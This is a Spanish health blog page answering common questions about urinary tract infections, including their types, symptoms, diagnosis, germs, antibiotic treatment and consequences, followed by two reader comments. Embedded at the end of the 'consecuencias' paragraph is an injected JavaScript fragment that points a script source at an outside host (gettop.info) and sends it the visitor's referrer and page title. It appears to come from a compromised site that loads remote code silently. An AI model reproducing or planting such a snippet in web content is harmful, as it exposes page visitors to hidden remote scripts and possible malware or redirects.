Salud y belleza » Enfermedades

Preguntas habituales sobre infecciones urinarias

2 Comentarios

 

¿Qué diferencia existe entre “cistitis”, “pielonefritis” e “ITU”?

La ITU, es decir Infección del Tracto Urinario, es un problema que afecta a cualquiera de las estructuras por las que circula la orina (desde su formación en los riñones hasta su expulsión por la uretra). El término “cistitis” se utiliza para definir a aquellas dificultades localizadas específicamente en los tramos inferiores, es decir en la vejiga y la uretra; la “pielonefritis”, en cambio, es la que afecta directamente al riñón.

¿Qué síntomas produce una infección urinaria (ITU)?

Los síntomas son diversos y pueden cambiar de acuerdo a la edad del afectado. Por ejemplo, suele manifestarse mediante fiebre o vómitos en niños pequeños; en niños mayores la enfermedad se presenta mediante dolores en la parte baja del abdomen, molestia al orinar o, en el caso de pielonefritis, dolor en la región lumbar con fiebre elevada.

¿Cómo se diagnostica?

Simple: a través de un análisis de orina. A menudo, las pruebas son de resultado rápido pero, aún así, para el diagnóstico completo y seguro se necesita recoger una muestra orina en condiciones estériles, enviarla a laboratorio y sembrarla para comprobar la existencia de un número determinado de gérmenes en la orina. Este proceso se define como urocultivo y para obtener los resultados se necesita de algunos días más.

¿Qué gérmenes están presentes en el desarrollo de la enfermedad?

Muchos. Aunque para su pronunciación quizás debamos forzar nuestras cuerdas bocales: “escherichia coli” (de hecho provoca el 80% de las infecciones urinarias),“proteus y klebsiella”,  “enterobacter”, “serratia”, “pseudomona”, “staphylococcus saprophyticus”, “streptococcus agalactiae”, “enterococcus”, “staphylococcus aureu” y “candida (hongo frecuente en pacientes con diabetes).

¿Qué hay sobre el tratamiento?

El tratamiento que se efectúa en los enfermos es a base de antibióticos. Pueden administrarse tanto por vía oral (en las infecciones de vías urinarias bajas) o hasta por vía intravenosa con ingreso hospitalario (en las pielonefritis).

¿Cuáles son sus consecuencias?

A decir vedad, las infecciones urinarias no tienen consecuencias perjudiciales a largo plazo ni tampoco provocan lesiones serias (si son tratadas a tiempo) especialmente si no son frecuentes y sólo afectan a las vías bajas. De todos modos, en el caso de los niños más pequeños las infecciones repetidas y mal tratadas o ignoradas pueden llegar a producir cicatrices y lesiones en los riñones permanentes. Por lo tanto estamos ante una problemática que difícilmente pueda llegar a ser considerada grave si se trata en su momento y se toma con responsabilidad.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

2 Comments »

  • Cistitis (I) said:

    [...] ¡No te pierdas la continuación de éste analisis con los cinco remedios restantes y si quieres saber más sobre problemas urinarios no dejes de consultar notas previas! [...]

  • liliana surco said:

    tengo un niño de 5 años que orina cada 10 minutos estoy asustada que puede ser no le duele al orinar pero a veces tiene ganas de vomitar no tiene fiebre en el colegio le han pateado 2 veces en sus partes sera eso la concecuencia ahora gracias

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.